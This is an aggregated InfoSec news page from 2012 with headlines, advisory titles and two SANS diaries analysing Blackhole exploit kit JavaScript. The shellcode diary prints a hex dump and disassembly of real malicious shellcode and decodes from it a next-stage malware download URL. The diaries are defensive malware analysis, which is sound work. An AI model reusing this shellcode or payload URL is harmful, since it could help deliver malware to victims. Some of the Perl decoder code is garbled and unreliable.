InfoSec News

Richard Porter --- ISC Handler on Duty (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Oracle has lost its bid to assert a third patent in its trial against Google, with a favorable decision from the U.S. Patent & Trademark Office coming "a few days too late," a judge ruled on Thursday.
Despite many competitors, Dropbox is the de facto standard for syncing files across one's own computers and sharing them with others. New features rolled out Monday extend Dropbox's reach substantially by making it possible to create a public, revokable link to any file or folder in a Dropbox sync folder. Previously, only items in a special Public folder could be shared, and the links couldn't be canceled; the item had to be moved out of the folder.
The White House today threatened a veto of the controversial Cyber Intelligence Sharing and Protection Act (CISPA) if the bill reaches President Obamas desk in its present form.
Privacy advocates and cloud services users are concerned about Google's terms of use for its new Drive storage services, saying Google can basically do what it wants with a customer's data.
Virtualization software vendor VMware today downplayed the seriousness of a source code leak involving the companys ESX hypervisor technology.
Advanced Micro Devices gained market share on Intel in worldwide x86 processor shipments during the first quarter on the strength of mobile and desktop shipment growth, Mercury Research said Wednesday.

Facebook Enlists InfoSec Mavens for Big Malware Vaccination
By Richard Adhikari Facebook is making friends with a wide variety of top computer security companies in an effort to eradicate the malware that flows through the social network. It's compiling the companies' databases of malicious URLs in order to ...

and more »
Chilkat Zip ChilkatZip2.DLL Multiple Arbitrary File Overwrite Vulnerabilities

Let's assume you finished the analysis of Blacole's obfuscated Javascript (see my earlier diary today), and you are still left with a code block like this

and you wonder what it does. The first step in Shell Code analysis is to clean it up, in the case at hand here, we have to remove those spurious script tags

because they would trip us up in any of the following steps.
Once we're left with only the actual unicode (%uxxyy...) , we can turn this into printable characters:
$ cat raw.js | perl -pe 's/%u(..)(..)/chr(hex($2)).chr(hex($1))/ge' decoded.bin

$ cat decoded.bin | hexdump -C
00000000 41 41 41 41 66 83 e4 fc fc eb 10 58 31 c9 66 81 |AAAAf..X1f.|

00000010 e9 57 fe 80 30 28 40 e2 fa eb 05 e8 eb ff ff ff |W.0(@.|

00000020 ad cc 5d 1c c1 77 1b e8 4c a3 68 18 a3 68 24 a3 |].w.Lh.h$|

00000030 58 34 7e a3 5e 20 1b f3 4e a3 76 14 2b 5c 1b 04 |X4~^ .Nv.+\..|

00000040 a9 c6 3d 38 d7 d7 90 a3 68 18 eb 6e 11 2e 5d d3 |=8.h.n..]|

This doesn't result in anything all that useful yet. Shellcode is in assembly language, so it wouldn't be readable in a hex dump anyway. But since most shellcode just downloads and runs an executable .. well, the name of the EXE could have been visible. Not in this case, because the shellcode is .. encoded one more time :).
Next step: Disassemble.
The quickest way to do so from a Unix command line (that I'm aware of) is to wrap the shell code into a small C program, compile it, and then disassemble it:
$ cat decoded.bin | perl -ne 's/(.)/printf 0x%02x,,ord($1)/ge decoded.c
results in
0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc,0xfc,0xeb,0x10,0x58,0x31,0xc9 [...]
which is the correct format to turn it into
$ cat decoded.c
unsigned char shellcode[] = {

0x41,0x41,0x41,0x41,0x66,0x83,0xe4,0xfc, [...] }
int main() { }
which in turn can be compiled:
$ gcc -O0 -fno-inline decoded.c -o decoded.obj
which in turn can be disassembled:
$ objdump -M intel,i386 -D decoded.obj decoded.asm
and we are left with a file decoded.asm. This file will contain all the glue logic that this program needs to run on Unix .. but we're not interested in that. The only thing we're after is the disassembled contents of the array shellcode:
0000000000600840 shellcode:
600840: 41 inc ecx
600841: 41 inc ecx
600842: 41 inc ecx
600843: 41 inc ecx
600844: 66 83 e4 fc and sp,0xfffffffc
600848: fc cld
600849: eb 10 jmp 60085b shellcode+0x1b
60084b: 58 pop eax
60084c: 31 c9 xor ecx,ecx
60084e: 66 81 e9 57 fe sub cx,0xfe57
600853: 80 30 28 xor BYTE PTR [eax],0x28
600856: 40 inc eax
600857: e2 fa loop 600853 shellcode+0x13
600859: eb 05 jmp 600860 shellcode+0x20
60085b: e8 eb ff ff ff call 60084b shellcode+0xb
600860: ad lods eax,DWORD PTR ds:[esi]
600861: cc int3
600862: 5d pop ebp
A-Ha! Somebody is XOR-ing something here with 0x28 (line 600853). If we look at this in a bit more detail, we notice an odd combination of JMP and CALL.

Why would the code JMP to an address only to CALL back to the address that's right behind the original JMP ? Well .. The shell code has no idea where it resides in memory when it runs, and in order to XOR-decode the remainder of the shellcode, it has to determine its current address. A CALL is a function call, and pushes a return address onto the CPU stack. Thus, after the call 60085b instruction, the stack will contain 600860 as the return address. The instruction at 60084b then pops this address from the stack, which means that register EAX now points to 600860 .. and xor [eax], 0x28 / inc eax then cycle over the shellcode, and XOR every byte with 0x28.
Let's try the same in Perl:
$ cat decoded.bin | perl -pe 's/(.)/chr(ord($1)^0x28)/ge' de-xored.bin
$ hexdump -C de-xored.bin | tail -5
00000190 0e 89 6f 01 bd 33 ca 8a 5b 1b c6 46 79 36 1a 2f |..o.3.[.Fy6./|

000001a0 70 68 74 74 70 3a 2f 2f 38 35 2e 32 35 2e 31 38 |phttp://85.25.18|

000001b0 39 2e 31 37 34 2f 71 2e 70 68 70 3f 66 3d 62 61 |9.174/q.php?f=ba|

000001c0 33 33 65 26 65 3d 31 00 00 28 25 0a |33ee=1..(%. |

Et voil, we get our next stage URL.
If you want to reproduce this analysis, you can find the original (raw.js) shellcode file on Pastebin.
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
IBM announced new "affordable" Linux servers on Wednesday as the company tries to push its new category of preconfigured servers for virtualization and big data to midmarket and enterprise customers.
Sprint Nextel will start offering 4G WiMax service to its Boost Mobile and Virgin Mobile prepaid customers later this quarter, CEO Dan Hesse said after the company reported a net loss for the first quarter.
The Mac's contribution to Apple's bottom line fell to an all-time low last quarter, according to data from the company.
The U.S. House of Representatives has passed a bill focused on helping taxpayers track federal spending online.
The Black Hole Exploit toolkit is behind the bulk of the HTML and Java exploits, according to version 12 of the Microsoft Security Intelligence Report.

Add to digg Add to StumbleUpon Add to del.icio.us Add to Google
Ah, what a week it's been. Ravelling the unravelled and fixing stuff I thought was fixed.
Less than a week ago, the Internet was abuzz with reports that Facebook's IPO would come in mid-May. Today, news reports are adding several more weeks to that timeline.
With the launch of Google Drive this week, IT managers can look forward to a potential new productivity tool -- and some significant headaches, analysts say
[SECURITY] [DSA 2460-1] asterisk security update
Multiple vulnerabilities in Piwigo
Sprint plans to stick with unlimited data plans for its smartphones, and that policy apparently will apply even if the next iPhone runs over 4G LTE, which is much faster than 3G service.
Box has given its API a makeover so that developers will have an easier time building and integrating applications with its software, and have those applications do more than is currently possible.
Joomla CCNewsLetter Module 'id' Parameter SQL Injection Vulnerability
systemd 'systemd-logind' Insecure Temporary File Handling Vulnerability
linux privileged and arbitrary chdir() (fixed at 5.4 cifs release)
[SECURITY] [DSA 2454-2] openssl incomplete fix
[SECURITY] [DSA 2548-1] iceape security update
[SECURITY] [DSA 2457-1] iceweasel security update
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Apple today announced that its annual developers conference would run June 11-15 in San Francisco -- and inside of two hours, the event had sold out.
Wipro, one of India's top outsourcers, reported slow revenue growth in U.S. dollar terms for the quarter ended March 31, and issued muted guidance for the next quarter, reflecting an uncertain outsourcing market.
The new Google Drive cloud storage service offers 5GB of storage and some nice features, but it's not yet an undisputed winner.

iTWire (press release)

Conseal Security Launches Major New Release of Conseal Server
iTWire (press release)
April 25th 2012 - Infosec, Stand K76 - Conseal Security, the provider of solutions to secure data on the move, today announced Conseal Server 2.0, enabling organisations to maintain complete control over their private data when it's on the move.

and more »
Microsoft has demonstrated support for the Open Document Format (ODF) 1.2 standard in a technical preview of the forthcoming Office 15 productivity suite, and plans to release a beta version with the feature late this summer.
A vulnerability in the firmware of several network-enabled Samsung TV models and possibly Blu-ray players allows potential attackers to put the vulnerable devices into an endless restart loop that requires the intervention of a technician to terminate, according to independent security researcher Luigi Auriemma.
For all of our advances in technology, getting a recommendation on what movie to watch still largely hinges on a sweater-clad film critic and the position of his thumb. Surely in this age of miracles--when a powerful computer controlled entirely by taps and swipes can fit comfortably inside a pocket--there can be a more tech-savvy solution to the age-old question of what movie to watch this evening?
Big data is fueling the need for ever-growing storage repositories. If you're looking to meet scalability concerns without breaking the bank, selecting a storage platform that can meet the needs of big data can be a challenge--but it doesn't have to be an overwhelming one.
Apple today announced that its annual developers conference would run June 11-15 in San Francisco.

Help Net Security

InfoSec: Hackers hit record number of UK businesses
In a report launched in time for this year's InfoSec event in London, PwC states that one in seven large UK businesses was hacked last year. The average such business faces a significant attack every week. But while the risks are heightening, ...
Security breaches costing UK firms billionsMicroScope (blog)

all 19 news articles »
Windows Phone can now be targeted by PhoneGap Build, a cloud-based service for creating cross-platform mobile phone apps, according to a Tuesday blog post from Nitobi, the service's creators.

Looking back on how we used to analyze malicious JavaScript five years ago, it is quite amazing to see the evolution of code obfuscation that the bad guys went through.
Most of the current obfuscation methods make heavy use of objects and functions that are only present in the web browser or Adobe reader. Since it is unlikely that a JavaScript analysis engine on, for example, a web proxy anti-virus solution can duplicate the entire object model of Internet Explorer, the bad guys are hoping that automated analysis will fail, and their JavaScript will make it past the virus defenses to the user's browser, where it will run just fine.
Often, this actually works. The current wave of Blackhole (Blacole) exploit kits are a good example - it took Anti-Virus a looong time to catch on to these infected web sites. Even today, the raw malicious JavaScript block full of exploit attempts comes back with only 14/41 on Virustotal

Here's what the Blacole obfuscated Javascript looks like:

Unlike older obfuscation methods, this Blacole encoding is almost human readable again. But automated analysis still has a tough time with it, because the code is heavy on browser objects and function prototypes:

None of this will run in command line JavaScript interpreters like SpiderMonkey. Analysis environments like Cuckoo and Wepawet are doing a pretty good job at this, but often also trip up.
If all else fails, while manual analysis of the code is tedious, it usually leads to the desired result. A bit further down in the JavaScript block, we find

This looks like a loop over the code block that replaces/transposes characters based on their ASCII code. If the ASCII Code is 25 and 52, 26 gets added to it. If it is =52 and 78, 26 gets subtracted. Otherwise, the ASCII code remains unchanged. This is like a poor man's Caesar Cipher, swapping out one letter against another.
Something we can readily reproduce in a couple lines of Perl :)
$cat decode.pl

#!/usr/bin/perl -w

while () {

$i $i++) {

if (($o25) ($o52)) {

} elsif (($o=52) ($o78)) {


And, lo and behold:
$cat malscript.js | ./decode.pl

The decoding is not yet complete (there are a couple more steps in this obfuscation), but the name and location of one of the EXEs is already apparent.

Thanks to ISC reader Jan for the sample.
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

EU Commissioner Kroes demands security investment at Infosec
By Mikael Ricknäs | IDG News Service | Published 01:50, 25 April 12 Neelie Kroes, the European Union's digital agenda commissioner, wants to use funds from the EU budget to invest in security technologies, and also called for more transparency in the ...

A top Chinese microblogging site has closed several user accounts for allegedly spreading political rumors, part of an ongoing government-backed campaign to scrub social networking sites of sensitive political talk.
Chinese handset maker Huawei Technologies expects its smartphone chip business will help further drive revenue, signaling that the company could try to compete in the worldwide mobile chip market.
Apple on Tuesday announced record first-quarter revenue on the back of soaring iPhone sales, with an assist from the iPad.
Asus in 2011 became one of the top five tablet makers, and though it still lags somewhat behind the market leaders, analysts say its influence on the market is clearly on the rise.

TechWeekEurope UK

Infosec: Raising Awareness Is The Best Cyber Defence
TechWeekEurope UK
The InfoSec show is being held for three days starting on Tuesday at London's Earls Court Exhibition Centre and Security B-Sides, a competing conference, at the Barbican, also in London. The shortage of security staff needs to be addressed by academia ...

and more »


Infosec: Government urges companies to reveal cyberattacks
By Anh Nguyen April 25, 2012 — Computerworld UK — David Willetts, minister of state for universities and science, has called for businesses to disclose their experiences of successful and unsuccessful cyberattacks. He believes that this will help to ...
David Willetts: UK firms need to 'fess up to security boobsRegister

all 8 news articles »

Wannabe infosec kingpins: Forget tech, grab a clipboard
By Phil Muncaster • Get more from this author Budding chief information security officers (CISOs) would be better off boning up on business, communication, and risk management skills than getting bogged down in detailed discussions about technology, ...


SSH firm aims to untangle crypto key hairball
By John Leyden • Get more from this author Infosec 2012 Secure Shell (SSH) certificate management – a key internet protocol used for remote access and file transfer for nearly 20 years now – can become quite a tangled issue if there isn't a clear ...

and more »

Cloudy crypto SSO firm: Passwords must go
By John Leyden • Get more from this author Infosec 2012 Cloudy crypto firm Ping Identity is pushing the benefits of using cloud-based technologies to reduce, and perhaps even eliminate, password headaches. The firm is using the Infosec show to promote ...

Chinese handset maker Huawei Technologies expects its smartphone chip business will help further drive revenue, signaling that the company could try to compete in the world's mobile chip market.
Business software vendor SAP expects software and software-related service revenue to increase in the range of 10 to 12 percent at constant currencies during the year, largely in line with preliminary estimates that the company released earlier this month.

IBM Announces New Threat Analytics to Help Organizations Better Identify ...
NEWS.GNOM.ES (press release)
ES/ — INFOSEC — IBM (NYSE: IBM) today unveiled new analytics using advanced security intelligence that can flag suspicious behavior in network activities to help better defend against hidden threats facing organizations. As organizations open up ...


ComputerWeekly.com (blog)

Infosec: IBM debuts anomaly detection system
Vendor claims latest product will protect end users from new breed of "subtle and sophisticated" hackers. By Caroline Donnelly, 25 Apr 2012 at 06:01 Vendor giant IBM claims traditional firewalls and anti-virus products are no match for the increasingly ...
IBM at InfoSec: security megatrends for application developmentComputerWeekly.com (blog)
IBM Announces New Threat Analytics to Help Organizations Better Identify ...Sacramento Bee

all 19 news articles »

Posted by InfoSec News on Apr 24


By Robert Lemos
Contributing Writer
Dark Reading
April 24, 2012

The recipe for a cyberattack is straightforward: Attackers gather
intelligence on the target's systems, research vulnerabilities, exploit
those weaknesses, gain control of the systems, and conduct
post-exploitation operations.

Yet, for...

Posted by InfoSec News on Apr 24


By Kevin McLaughlin
April 24, 2012

VMware's ESX hypervisor source code leak may stem from an attack on a
Chinese import-export firm last month in which an anonymous hacker
claims to have made off with more than one terabyte of confidential

On Tuesday, Kaspersky Lab's Threatpost blog reported the details of its...

Posted by InfoSec News on Apr 24


By Ken Terry
April 24, 2012

For the second time in less than a month, there has been a major data
security breach at a state Medicaid agency. The South Carolina
Department of Health and Human Services (SCDHHS) discovered on April 10
that an employee of the state's Medicaid program had transferred
personal information of 228,435 Medicaid...

Posted by InfoSec News on Apr 24


By Alice Lipowicz
April 23, 2012

Iris recognition technology used to identify an individual from a crowd
is accurate 90 percent to 99 percent of the time, according to a new
report from the National Institute of Standards & Technology (NIST).

NIST’s Iris Exchange III report also found some trade-offs between
accuracy and speed, the April 16 final report indicated....

Posted by InfoSec News on Apr 24


By John Leyden
The Register
24th April 2012

Infosec 2012 - Hackers are increasingly turning to automated software
tools to launch attacks.

According to research from Imperva, more than 60 per cent of SQL
injection attacks and as many as 70 per cent of Remote File Inclusion
attacks (the two most common attack types) are automated. Remote File
Inclusion attacks allows hackers to plant...
Internet Storm Center Infocon Status